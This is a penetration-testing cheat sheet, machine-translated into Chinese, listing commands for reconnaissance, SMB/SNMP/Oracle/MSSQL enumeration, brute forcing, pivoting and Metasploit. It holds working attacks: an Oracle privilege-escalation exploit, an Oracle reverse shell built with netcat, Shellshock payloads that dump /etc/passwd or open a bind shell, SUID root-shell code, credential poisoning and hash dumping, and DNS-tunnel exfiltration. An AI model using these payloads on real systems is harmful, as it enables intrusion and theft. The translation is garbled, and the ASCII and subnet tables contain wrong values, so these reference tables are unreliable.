渗透测试工具作弊表

渗透测试工具作弊表,典型穿透测试工作的快速参考高级概述。设计为快速参考作弊表,提供执行渗透测试时将运行的典型命令的高级概述。对于更深入的信息,我会从右侧的菜单中推荐该工具的man文件或更具体的笔测试作弊表。

 

VLAN跳跃等 – 查看下面的TOC。

  • 介绍
    • 更新日志
  • 预告
    • 设置IP地址
    • 子网划分
    • 网络配置
  • OSINT
    • DNS
    • WHOIS枚举
    • 执行DNS IP查找
    • 执行MX记录查找
    • 用DIG执行区域传输
    • 被动信息收集
  • DNS区域转移
    • DNS暴力
    • 端口扫描
    • DNSRecon
    • Nmap UDP扫描
    • UDP协议扫描器
    • 其他主机发现
    • Nmap命令
    • 基本手指印刷
    • 横幅抓NC
    • 简单电子邮件
    • 电子邮件
    • 半主动信息收集
    • 活动信息收集
  • 枚举和攻击网络服务
    • 指定特定用户名
    • 显示所有登录用户的Solaris错误:
    • RSH枚举
    • RSH运行命令
    • Metasploit RSH登录扫描仪
    • rusers显示登录用户
    • rusers扫描整个子网
    • SNMPv3枚举
    • Metasploit LLMNR / NetBIOS请求
    • Responder.py
    • 桑巴枚举
    • SMB枚举工具
    • 指纹SMB版本
    • 查找打开的SMB共享
    • 枚举SMB用户
    • 手动空会话测试:
    • NBTS可以unixwiz
    • SAMB / SMB / Windows域枚举
    • LLMNR / NBT-NS欺骗
    • SNMP枚举
    • R服务枚举
    • 手指枚举
    • rwho中
  • TLS和SSL测试
    • testssl.sh
  • 漏洞评估
  • 数据库渗透测试
    • Bruteforce MSSQL登录
    • Metasploit MSSQL Shell
    • 指纹Oracle TNS版本
    • 强力oracle用户帐号
    • Oracle特权升级
    • 使用NMAP NSE脚本识别oracle数据库中的默认帐户:
    • 如何识别oracle用户的当前权限级别:
    • Oracle priv esc并获取DBA访问权限:
    • 使用select查询运行漏洞:
    • 删除漏洞利用:
    • 获取Oracle Reverse os-shell:
    • 神谕
    • MSSQL
  • 网络
    • 攻击机
    • IKEForce
    • IKE侵略模式PSK破解
    • PPTP黑客
    • 步骤1:Idenitfy IKE服务器
    • 步骤2:使用IKEForce枚举组名
    • 步骤3:使用ike-scan来捕获PSK散列
    • 步骤4:使用psk-crack来破解PSK哈希
    • NMAP PPTP指纹:
    • PPTP字典攻击
    • 有级IP范围
    • IPv4私有地址范围
    • IPv4子网作弊表
    • SSH枢轴
    • Meterpreter枢轴
    • Plink.exe隧道
    • 旋转
    • TTL手指打印
    • IPv4作弊表
    • VLAN跳跃
    • VPN黑客
    • DNS隧道
  • BOF / Exploit
  • 利用研究
    • 利用贝壳
    • 猫文件(查看文件内容)
    • Shell Shock运行绑定shell
    • 壳牌反击壳
    • 搜索漏洞利用
    • 在Kali编译Windows漏洞
    • 交叉编译漏洞
    • 利用常见的漏洞
  • 简单的本地Web服务器
  • 挂载文件共享
  • HTTP / HTTPS Web服务器枚举
  • 包检测
  • 用户名称枚举
    • SMB用户枚举
    • SNMP用户枚举
  • 密码
    • 生词
  • 强制服务
    • Hydra FTP暴力
    • 九头蛇POP3暴力
    • Hydra SMTP暴力
  • 密码破解
    • 约翰开膛手 – JTR
  • Windows渗透测试命令
  • Linux渗透测试命令
  • 编译漏洞
    • 识别C代码是否适用于Windows或Linux
    • 构建利用GCC
    • GCC编译32位攻击64位Kali
    • 在Linux上编译Windows .exe
  • SUID二进制
    • SUID C Shell / bin / bash
    • SUID C Shell / bin / sh
    • 构建SUID Shell二进制文件
  • 反向壳牌
  • TTY Shells
    • Python TTY Shell Trick
    • Spawn交互式sh shell
    • Spawn Perl TTY Shell
    • Spawn Ruby TTY Shell
    • Spawn Lua TTY壳牌
    • 来自Vi的Spawn TTY Shell
    • Spawn TTY Shell NMAP
  • Metasploit的
    • Meterpreter有效载荷
    • Windows反向计量器有效载荷
    • Windows VNC Meterpreter有效载荷
    • Linux反向Meterpreter有效载荷
  • Meterpreter作弊表
  • 常见的Metasploit模块
    • 远程Windows Metasploit模块(exploits)
    • 本地Windows Metasploit模块(exploits)
    • 辅助Metasploit模块
    • Metasploit Powershell模块
    • 后利用Windows Metasploit模块
  • ASCII表作弊表
  • CISCO IOS命令
  • 加密
    • 哈希长度
    • 哈希示例
  • SQLMap示例

预啮合

网络配置

设置IP地址

ifconfig eth0 xxx.xxx.xxx.xxx/24 

子网划分

ipcalc xxx.xxx.xxx.xxx/24 ipcalc xxx.xxx.xxx.xxx 255.255.255.0 

OSINT

被动信息收集

DNS

WHOIS枚举
whois domain-name-here.com 
执行DNS IP查找
dig a domain-name-here.com @nameserver 
执行MX记录查找
dig mx domain-name-here.com @nameserver
用DIG执行区域传输
dig axfr domain-name-here.com @nameserver

DNS区域转移

命令 描述
nslookup -> set type=any -> ls -d blah.com Windows DNS区域传输
dig axfr blah.com @ns1.blah.com Linux DNS区域传输

电子邮件

简单电子邮件

使用简单的电子邮件枚举所有在线的地方(github,目标网站等),如果您使用代理或设置较长的节流时间,Google将不会认为您是机器人,并填写验证码,那么它的效果会更好。

git clone https://github.com/killswitch-GUI/SimplyEmail.git./SimplyEmail.py -all -e TARGET-DOMAIN

简单电子邮件可以在收集后验证发现的电子邮件地址。

半主动信息收集

基本手指印刷

手动手指/横幅抓取。

命令 描述
nc -v 192.168.1.1 25

telnet 192.168.1.1 25

通过显示横幅进行基本版本/手指打印

横幅抓NC

nc TARGET-IP 80GET / HTTP/1.1Host: TARGET-IPUser-Agent: Mozilla/5.0Referrer: meh-domain<enter>

活动信息收集

DNS暴力

DNSRecon

DNS枚举Kali – DNSRecon

root# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std –xml ouput.xml

端口扫描

Nmap命令

有关更多命令,请参阅Nmap作弊表(右侧菜单中的链接)。

基本Nmap命令:

命令 描述
nmap -v -sS -A -T4 target Nmap详细扫描,运行syn隐身,T4定时(在LAN上应该可以),OS和服务版本信息,traceroute和脚本对服务
nmap -v -sS -p--A -T4 target 如上所述,扫描所有TCP端口(需要更长的时间)
nmap -v -sU -sS -p- -A -T4 target 如上所述,扫描所有TCP端口和UDP扫描(需要更长时间)
nmap -v -p 445 --script=smb-check-vulns
--script-args=unsafe=1 192.168.1.X
用于扫描易受攻击的SMB服务器的Nmap脚本 – 警告:不安全= 1可能会导致死机
ls /usr/share/nmap/scripts/* | grep ftp 搜索关键字的nmap脚本
Nmap UDP扫描
nmap -sU TARGET 
UDP协议扫描器
git clone https://github.com/portcullislabs/udp-proto-scanner.git

扫描所有服务的IP地址文件:

./udp-protocol-scanner.pl -f ip.txt 

扫描特定的UDP服务:

udp-proto-scanner.pl -p ntp -f ips.txt
其他主机发现

主机发现的其他方法,不使用nmap …

命令 描述
netdiscover -r 192.168.1.0/24 从ARP发现子网上的IP,MAC地址和MAC供应商,有助于确认您在$客户端站点处于正确的VLAN

枚举和攻击网络服务

将专门识别和/或枚举网络服务的工具:

SAMB / SMB / Windows域枚举

桑巴枚举

SMB枚举工具
nmblookup -A targetsmbclient //MOUNT/share -I target -Nrpcclient -U "" targetenum4linux target

另请参阅,nbtscan作弊表(右手菜单)。

命令 描述
nbtscan 192.168.1.0/24 在子网上查找Windows / Samba服务器,查找Windows MAC地址,netbios名称并发现客户端工作组/域
enum4linux -a target-ip 做一切,运行所有选项(查找Windows客户端域/工作组)除了基于字典的共享名称猜测
指纹SMB版本
smbclient -L //192.168.1.100 
查找打开的SMB共享
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24   
枚举SMB用户
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX

RID骑自行车:

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

用于RID循环的Metasploit模块:

use auxiliary/scanner/smb/smb_lookupsid
手动空会话测试:

视窗:

net use \\TARGET\IPC$ "" /u:""

Linux的:

smbclient -L //192.168.99.131
NBTS可以unixwiz

安装在卡利滚动:

apt-get install nbtscan-unixwiz nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

LLMNR / NBT-NS欺骗

从网络窃取凭据。

Metasploit LLMNR / NetBIOS请求

欺骗/毒药LLMNR / NetBIOS请求:

auxiliary/spoof/llmnr/llmnr_responseauxiliary/spoof/nbns/nbns_response

捕获散列:

auxiliary/server/capture/smbauxiliary/server/capture/http_ntlm

你最终会遇到NTLMv2哈希,使用john或者hashcat来破解它。

Responder.py

或者,您可以使用响应者。

git clone https://github.com/SpiderLabs/Responder.gitpython Responder.py -i local-ip -I eth0
运行Responder.py进行整个交互

在处理其他攻击向量时,请运行Responder.py来达成一致。

SNMP枚举

修复SNMP输出值,使其可读取:

apt-get install snmp-mibs-downloader download-mibsecho "" > /etc/snmp/snmp.conf
命令 描述
snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMP枚举

SNMPv3枚举

带有nmap的Idenitfy SNMPv3服务器:

nmap -sV -p 161 --script=snmp-info TARGET-SUBNET

Rory McCune的snmpwalk包装脚本有助于自动化SNMPv3的用户名列表过程:

apt-get install snmp snmp-mibs-downloaderwget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
使用Metasploits Wordlist

Metasploit的wordlist(以下的KALI路径)具有SNMP v1 v1和v2的共同凭据,对于较新的凭据,请查看Daniel Miessler在GitHub上的SecLists项目(不是邮件列表!)。

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

R服务枚举

这是遗产,包括为完整性。

nmap -A将执行下面列出的所有rservices枚举,此部分是为了完整性或手动确认而添加的:

RSH枚举

RSH运行命令
rsh <target> <command>
Metasploit RSH登录扫描仪
auxiliary/scanner/rservices/rsh_login
rusers显示登录用户
rusers -al 192.168.2.1
rusers扫描整个子网
rlogin -l <user> <target>

例如rlogin -l root TARGET-SUBNET / 24

手指枚举

finger @TARGET-IP

指定特定用户名

finger batman@TARGET-IP 

显示所有登录用户的Solaris错误:

finger 0@host  SunOS: RPC services allow user enum:$ rusers # users logged onto LANfinger 'a b c d e f g h'@sunhost 

rwho中

使用nmap来识别运行rwhod(513 UDP)的机器

TLS和SSL测试

testssl.sh

测试单个主机上的所有内容并输出到.html文件:

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html  

漏洞评估

在Kali上安装OpenVAS 8滚动:

apt-get updateapt-get dist-upgrade -yapt-get install openvasopenvas-setup

验证openvas正在运行:

netstat -tulpn

登录https://127.0.0.1:9392 – 凭据在openvas-setup期间生成。

数据库渗透测试

攻击在网络上暴露的数据库服务器。

神谕

安装示波器:

apt-get install oscanner  

运行示波器:

oscanner -s 192.168.1.200 -P 1521 

指纹Oracle TNS版本

安装tnscmd10g:

apt-get install tnscmd10g

指纹oracle tns:

tnscmd10g version -h TARGETnmap --script=oracle-tns-version 

强力oracle用户帐号

识别默认Oracle帐户:

 nmap --script=oracle-sid-brute 
 nmap --script=oracle-brute 

对Oracle TNS运行nmap脚本:

nmap -p 1521 -A TARGET

Oracle特权升级

要求:

  • Oracle需要在网络上公开
  • 默认帐户正在使用,如scott

快速概述如何运作:

  1. 创建功能
  2. 在表SYS.DUAL上创建一个索引
  3. 我们刚刚创建的索引执行我们的函数SCOTT.DBA_X
  4. 该功能将由SYS用户执行(因为该用户拥有该表)。
  5. 创建一个帐户与DBA priveleges

在下面的示例中,用户SCOTT被使用,但是应该可以使用另一个默认的Oracle帐户。

使用NMAP NSE脚本识别oracle数据库中的默认帐户:
nmap --script=oracle-sid-brute nmap --script=oracle-brute 

使用识别的弱帐户登录(假设您找到一个)。

如何识别oracle用户的当前权限级别:
SQL> select * from session_privs; SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid curren_user is pragma autonomous_transaction; begin execute immediate 'grant dba to user1 identified by pass1';commit;return 'FOO';end;
Oracle priv esc并获取DBA访问权限:

运行netcat:netcat -nvlp 443code>

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
使用select查询运行漏洞:
SQL> Select * from session_privs; 

您应该有一个具有creds user1和pass1的DBA用户。

通过重新运行第一个命令,验证您是否具有DBA权限。

删除漏洞利用:
drop index exploit_1337; 
获取Oracle Reverse os-shell:
begindbms_scheduler.create_job( job_name    => 'MEH1337',job_type    =>
    'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
    SYSTIMESTAMP,enabled    => FALSE,auto_drop => TRUE); dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');dbms_scheduler.enable('rev_shell'); end; 

MSSQL

枚举/发现:

NMAP:

nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Metasploit的:

msf > use auxiliary/scanner/mssql/mssql_ping
使用MS SQL Server浏览更多

尝试使用“浏览更多”通过MS SQL Server Management Studio

Bruteforce MSSQL登录

msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell

msf > use exploit/windows/mssql/mssql_payloadmsf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

网络

Plink.exe隧道

PuTTY Link隧道

将远程端口转发到本地地址:

plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP

旋转

SSH枢轴

ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip

在/etc/proxychains.conf中添加socks4 127.0.0.1 1010

SSH从一个网络转向另一个网络:

ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1

在/etc/proxychains.conf中添加socks4 127.0.0.1 1010

proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2

在/etc/proxychains.conf中添加socks4 127.0.0.1 1011

Meterpreter枢轴

TTL手指打印

操作系统 TTL大小
视窗 128
Linux的 64
的Solaris 255
思科/网络 255

IPv4作弊表

有级IP范围

例如A,B,C(折旧)

IP地址范围
A类IP地址范围 0.0.0.0 - 127.255.255.255
B类IP地址范围 128.0.0.0 - 191.255.255.255
C类IP地址范围 192.0.0.0 - 223.255.255.255
D类IP地址范围 224.0.0.0 - 239.255.255.255
E类IP地址范围 240.0.0.0 - 255.255.255.255

IPv4私有地址范围

范围
A类私人地址范围 10.0.0.0 - 10.255.255.255
B类私人地址范围 172.16.0.0 - 172.31.255.255
C类私人地址范围 192.168.0.0 - 192.168.255.255
127.0.0.0 - 127.255.255.255

IPv4子网作弊表

CIDR 小数面膜 主机数量
/ 31 255.255.255.254 1 Host
/ 30 255.255.255.252 2 Hosts
/ 29 255.255.255.249 6 Hosts
/ 28 255.255.255.240 14 Hosts
/ 27 255.255.255.224 30 Hosts
/ 26 255.255.255.192 62 Hosts
/ 25 255.255.255.128 126 Hosts
/ 24 255.255.255.0 254 Hosts
/ 23 255.255.254.0 512 Host
/ 22 255.255.252.0 1022 Hosts
/ 21 255.255.248.0 2046 Hosts
/ 20 255.255.240.0 4094 Hosts
/ 19 255.255.224.0 8190 Hosts
/ 18 255.255.192.0 16382 Hosts
/ 17 255.255.128.0 32766 Hosts
/ 16 255.255.0.0 65534 Hosts
/ 15 255.254.0.0 131070 Hosts
/ 14 255.252.0.0 262142 Hosts
/ 13 255.248.0.0 524286 Hosts
/ 12 255.240.0.0 1048674 Hosts
/ 11 255.224.0.0 2097150 Hosts
/ 10 255.192.0.0 4194302 Hosts
/ 9 255.128.0.0 8388606 Hosts
/ 8 255.0.0.0 16777214 Hosts

VLAN跳跃

使用NCCGroups Yersina的VLAN封装脚本简化了过程。

git clone https://github.com/nccgroup/vlan-hopping.gitchmod 700 frogger.sh./frogger.sh 

VPN黑客

识别VPN服务器:

./udp-protocol-scanner.pl -p ike TARGET(s)

扫描VPN服务器的范围:

./udp-protocol-scanner.pl -p ike -f ip.txt

IKEForce

使用IKEForce枚举或字典攻击VPN服务器。

安装:

pip install pyipgit clone https://github.com/SpiderLabs/ikeforce.git

使用IKEForce执行IKE VPN枚举:

./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

使用IKEForce的Bruteforce IKE VPN:

./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scanike-scan TARGET-IPike-scan -A TARGET-IPike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

IKE侵略模式PSK破解

  1. 识别VPN服务器
  2. 枚举使用IKEForce获取组ID
  3. 使用ike-scan从IKE端点捕获PSK散列
  4. 使用psk-crack来破解哈希
步骤1:Idenitfy IKE服务器
./udp-protocol-scanner.pl -p ike SUBNET/24
步骤2:使用IKEForce枚举组名
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
步骤3:使用ike-scan来捕获PSK散列
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
步骤4:使用psk-crack来破解PSK哈希
psk-crack hash-file.txt

一些更高级的psk-crack选项如下:

pskcrackpsk-crack -b 5 TARGET-IPkeypsk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134keypsk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP黑客

识别PPTP,它监听TCP:1723

NMAP PPTP指纹:
nmap –Pn -sV -p 1723 TARGET(S)
PPTP字典攻击
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

DNS隧道

通过DNS隧道传输数据以绕过防火墙。

dnscat2支持“下载”和“上传”用于从目标机器获取文件(数据和程序)的命令。

攻击机

制作安装:

apt-get updateapt-get -y install ruby-dev git make g++gem install bundlergit clone https://github.com/iagox86/dnscat2.gitcd dnscat2/serverbundle install

运行dnscat2:

ruby ./dnscat2.rbdnscat2> New session established: 1422dnscat2> session -i 1422

目标机:

https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/

dnscat --host <dnscat server_ip>

BOF / Exploit

利用研究

查找枚举主机/服务的漏洞。

命令 描述
searchsploit windows 2003 | grep -i local 搜索exploit-db for exploit,在这个例子中为windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 使用谷歌搜索exploit-db.com的漏洞
grep -R "W7" /usr/share/metasploit-framework
/modules/exploit/windows/*
搜索metasploit模块使用grep – msf搜索有一点

搜索漏洞利用

安装exploit-db的本地副本:

 searchsploit –u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

在Kali编译Windows漏洞

  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe  

交叉编译漏洞

gcc -m32 -o output32 hello.c (32 bit)gcc -m64 -o output hello.c (64 bit)

利用常见的漏洞

利用贝壳

用于查找和利用易受Shellshock攻击的服务器的工具:

git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
猫文件(查看文件内容)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock运行绑定shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
壳牌反击壳
nc -l -p 443

简单的本地Web服务器

Python本地Web服务器命令,方便在攻击机器上提供shell和exploit。

命令 描述
python -m SimpleHTTPServer 80 运行基本的http服务器,非常适合提供shell等
python3 -m http.server 运行基本的Python3 http服务器,非常适合提供shell等
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
运行ruby webrick基本的http服务器
php -S 0.0.0.0:80 运行基本的PHP http服务器

挂载文件共享

如何挂载NFS / CIFS,Windows和Linux文件共享。

命令 描述
mount 192.168.1.1:/vol/share /mnt/nfs 挂载NFS共享到 /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
在Linux上安装Windows CIFS / SMB共享,/mnt/cifs如果您删除密码,它将在CLI上提示(更安全,因为它不会在bash_history中结束)
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
从命令行在Windows上安装Windows共享
apt-get install smb4k -y 在Kali上安装smb4k,用于浏览SMB共享的有用的Linux GUI

HTTP / HTTPS Web服务器枚举

命令 描述
nikto -h 192.168.1.1 对目标执行nikto扫描
dirbuster 通过GUI进行配置,CLI输入大部分时间不起作用

包检测

命令 描述
tcpdump tcp port 80 -w output.pcap -i eth0 接口eth0上端口80的tcpdump输出到output.pcap

用户名称枚举

一些技术用于远程枚举目标系统上的用户。

SMB用户枚举

命令 描述
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
枚举来自SMB的用户
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID循环SMB /枚举来自SMB的用户

SNMP用户枚举

命令 描述
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4
从SNMP中吸引用户
python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX
从SNMP中吸引用户
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
搜索具有nmap,grepable输出的SNMP服务器

密码

生词

命令 描述
/usr/share/wordlists 卡利词列表

强制服务

Hydra FTP暴力

命令 描述
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V
Hydra FTP暴力

九头蛇POP3暴力

命令 描述
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V
九头蛇POP3暴力

Hydra SMTP暴力

命令 描述
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V 九头蛇SMTP暴力

使用-t限制并发连接,例如:-t 15

密码破解

约翰开膛手 – JTR

命令 描述
john --wordlist=/usr/share/wordlists/rockyou.txt hashes JTR密码破解
john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR强制用wordlist进行破解
john --format=descrypt hash --show JTR强制描述强力开裂

Windows渗透测试命令

请参阅Windows渗透测试命令。

Linux渗透测试命令

有关Linux渗透测试命令的列表,请参阅Linux命令作弊表(右键菜单),对本地系统枚举有用。

编译漏洞

关于编译漏洞的一些注释。

识别C代码是否适用于Windows或Linux

C #include将指出应该使用哪个操作系统来构建漏洞。

命令 描述
process.h, string.h, winbase.h, windows.h, winsock2.h Windows漏洞利用代码
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h
Linux漏洞代码

构建利用GCC

编译漏洞gcc

命令 描述
gcc -o exploit exploit.c 基本GCC编译

GCC编译32位攻击64位Kali

用于在64位攻击机上交叉编译32位二进制文件。

命令 描述
gcc -m32 exploit.c -o exploit 在64位Linux上交叉编译32位二进制文件

在Linux上编译Windows .exe

在Linux上构建/编译Windows漏洞,导致一个.exe文件。

命令 描述
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe 在Linux上编译windows .exe

SUID二进制

通常,SUID C二进制文件需要以超级用户身份生成shell,您可以根据需要更新UID / GID和shell。

以下是各种贝壳的一些快速复制和例子:

SUID C Shell / bin / bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");}       

SUID C Shell / bin / sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");}       

构建SUID Shell二进制文件

gcc -o suid suid.c  

对于32位:

gcc -m32 -o suid suid.c  

反向壳牌

有关有用的反向Shell的列表,请参阅反向Shell作弊表。

TTY Shells

从Linux中的有限外壳生成TTY shell的技巧/技巧,对于运行像su反向shell 这样的命令非常有用。

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Spawn交互式sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";perl e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY壳牌

os.execute('/bin/sh')

来自Vi的Spawn TTY Shell

从vi运行shell命令:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit的

一些基本的Metasploit的东西,我已经找到方便的参考。

基本Metasploit命令,有助于参考,用于旋转参见 – Meterpreter枢转技术。

Meterpreter有效载荷

Windows反向计量器有效载荷

命令 描述
set payload windows/meterpreter/reverse_tcp Windows反向tcp有效载荷

Windows VNC Meterpreter有效载荷

命令 描述
set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC有效载荷

Linux反向Meterpreter有效载荷

命令 描述
set payload linux/meterpreter/reverse_tcp Meterpreter Linux反向有效负载

Meterpreter作弊表

有用的抄表命令。

命令 描述
upload file c:\\windows Meterpreter将文件上传到Windows目标
download c:\\windows\\repair\\sam /tmp Meterpreter从Windows目标下载文件
download c:\\windows\\repair\\sam /tmp Meterpreter从Windows目标下载文件
execute -f c:\\windows\temp\exploit.exe Meterpreter在目标上运行.exe,方便执行上传的漏洞利用
execute -f cmd -c 用cmd shell创建新通道
ps 仪表显示过程
shell Meterpreter在目标上获取shell
getsystem Meterpreter尝试特权升级目标
hashdump Meterpreter尝试将哈希值转储到目标上
portfwd add –l 3389 –p 3389 –r target Meterpreter将端口创建到目标机器
portfwd delete –l 3389 –p 3389 –r target Meterpreter向前删除端口

常见的Metasploit模块

顶层metasploit模块。

远程Windows Metasploit模块(exploits)

命令 描述
use exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k,XP,2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi MS08_040 Windows NT,2k,XP,2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1 / SP2和Server 2008(x86)远程漏洞利用

本地Windows Metasploit模块(exploits)

命令 描述
use exploit/windows/local/bypassuac 在Windows 7上绕过UAC +设置目标+ arch,x86 / 64

辅助Metasploit模块

命令 描述
use auxiliary/scanner/http/dir_scanner Metasploit HTTP目录扫描器
use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS漏洞扫描器
use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL凭证扫描仪
use auxiliary/scanner/mysql/mysql_version Metasploit MSSQL版本扫描仪
use auxiliary/scanner/oracle/oracle_login Metasploit Oracle登录模块

Metasploit Powershell模块

命令 描述
use exploit/multi/script/web_delivery Metasploit powershell有效载荷传递模块
post/windows/manage/powershell/exec_powershell Metasploit上传并通过会话运行powershell脚本
use exploit/multi/http/jboss_maindeployer Metasploit JBOSS部署
use exploit/windows/mssql/mssql_payload Metasploit MSSQL有效载荷

后利用Windows Metasploit模块

Windows Metasploit模块用于特权升级。

命令 描述
run post/windows/gather/win_privs Metasploit显示当前用户的特权
use post/windows/gather/credentials/gpp Metasploit抓GPP保存密码
load mimikatz -> wdigest Metasplit负载Mimikatz
run post/windows/gather/local_admin_search_enum Idenitfy提供的域用户具有管理访问权限的其他计算机
run post/windows/gather/smart_hashdump 自动转储sam文件,尝试esc权限等

ASCII表作弊表

有用的Web应用程序渗透测试,或者如果您在火星上搁浅,需要与NASA进行通信。

ASCII 字符
x00 空字节
x08 BS
x09 标签
x0a LF
x0d CR
x1b 退出
x20 SPC
x21
x22
x23
x24 $
x25
x26
x27 `
x28
x29
x2a *
x2b +
x2c
x2d
x2e
x2f /
x30 0
x31 1
x32 2
x33 3
x34 4
x35
x36 6
x37 7
x38 8
x39 9
x3a
x3b ;
x3c <
x3d =
x3e >
x3f
x40 @
x41 一个
x42
x43 C
x44 ð
x45 Ë
x46 F
x47 G
x48 H
x49 一世
x4a Ĵ
x4b ķ
x4c 大号
x4d 中号
x4e ñ
x4f Ø
x50 P
x51 Q
x52 [R
x53 小号
x54 Ť
x55 ü
x56 V
x57 w ^
x58 X
x59 ÿ
x5a ž
x5b [
x5c \
x5d ]
x5e ^
x5f _
x60 `
x61 一个
x62 b
x63 C
x64 ð
x65 Ë
x66 F
x67 G
x68 H
x69 一世
x6a Ĵ
x6b ķ
x6c
x6d
x6e ñ
x6f Ø
x70 p
x71 q
x72 [R
x73 小号
x74 Ť
x75 ü
x76 v
x77 w ^
x78 X
x79 ÿ
x7a ž

CISCO IOS命令

一组有用的Cisco IOS命令。

命令 描述
enable 进入启用模式
conf t 短路,配置终端
(config)# interface fa0/0 配置FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 将ip添加到fa0 / 0
(config-if)# ip addr 0.0.0.0 255.255.255.255 将ip添加到fa0 / 0
(config-if)# line vty 0 4 配置vty行
(config-line)# login 思科设置telnet密码
(config-line)# password YOUR-PASSWORD 设置telnet密码
# show running-config 显示内存中加载的运行配置
# show startup-config 显示sartup配置
# show version 显示cisco IOS版本
# show session 显示开放会话
# show ip interface 显示网络接口
# show interface e0 显示详细的界面信息
# show ip route 显示路线
# show access-lists 显示访问列表
# dir file systems 显示可用的文件
# dir all-filesystems 文件信息
# dir /all SHOW已删除的文件
# terminal length 0 终端输出无限制
# copy running-config tftp 复制运行配置到tftp服务器
# copy running-config startup-config 将startup-config复制到running-config

加密

哈希长度

哈希 尺寸
MD5哈希长度 16 Bytes
SHA-1哈希长度 20 Bytes
SHA-256哈希长度 32 Bytes
SHA-512哈希长度 64 Bytes

